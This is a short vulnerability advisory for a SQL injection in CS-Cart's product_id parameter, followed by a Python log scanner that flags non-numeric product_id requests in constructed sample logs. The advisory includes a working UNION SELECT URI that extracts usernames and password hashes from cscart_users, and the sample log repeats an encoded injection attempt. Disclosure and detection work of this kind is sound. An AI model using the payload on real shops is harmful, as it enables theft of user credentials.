CS-Cart 'product_id' Parameter SQL Injection Vulnerability

Attackers can use a browser to exploit this issue.

The following example URI is available:

http://www.example.com/[path]/index.php?dispatch=products.view&product_id=289' UNION SELECT 0,0,0,0,0,0,0,0,0,0,0,0,concat(user_login,0x3a,password),0,0 from cscart_users/*
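
A defender-side check for this issue, as an added example that is not part of the original advisory: it scans web access logs for products.view requests whose product_id is not a plain decimal integer. The log lines, the /shop/ path, the function names and the assumption that legitimate product IDs are purely numeric are constructed for illustration.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Constructed sample access-log lines (combined log format), not real traffic.
SAMPLE_LOG = """\
203.0.113.5 - - [12/Mar/2010:10:01:02 +0000] "GET /shop/index.php?dispatch=products.view&product_id=289 HTTP/1.1" 200 5120
203.0.113.9 - - [12/Mar/2010:10:01:07 +0000] "GET /shop/index.php?dispatch=products.view&product_id=289%27%20UNION%20SELECT%200,0 HTTP/1.1" 200 812
203.0.113.9 - - [12/Mar/2010:10:01:09 +0000] "GET /shop/index.php?dispatch=products.view&product_id=289%2527 HTTP/1.1" 200 812
203.0.113.7 - - [12/Mar/2010:10:02:00 +0000] "GET /shop/index.php?dispatch=categories.view&category_id=12 HTTP/1.1" 200 4096
"""

# Client address and request target from a combined-log-format line.
REQUEST_RE = re.compile(r'^(\S+) .*?"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')


def fully_decode(value, max_rounds=3):
    """Undo repeated percent-encoding (e.g. %2527 -> %27 -> ')."""
    for _ in range(max_rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value


def suspicious_product_requests(log_text):
    """Return (client, decoded product_id) for products.view requests
    whose product_id is not a plain decimal integer."""
    hits = []
    for line in log_text.splitlines():
        m = REQUEST_RE.match(line)
        if not m:
            continue
        client, target = m.groups()
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        # Only the dispatch named in the advisory is inspected here.
        if "products.view" not in params.get("dispatch", []):
            continue
        for raw in params.get("product_id", []):
            value = fully_decode(raw)  # parse_qs already decoded once
            if not re.fullmatch(r"\d+", value):
                hits.append((client, value))
    return hits


if __name__ == "__main__":
    for client, value in suspicious_product_requests(SAMPLE_LOG):
        print(f"{client} sent non-numeric product_id: {value!r}")
```

The same integer-only rule can be enforced at the application or WAF layer so that a non-numeric product_id never reaches the database query.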


 

Copyright 2010, SecurityFocus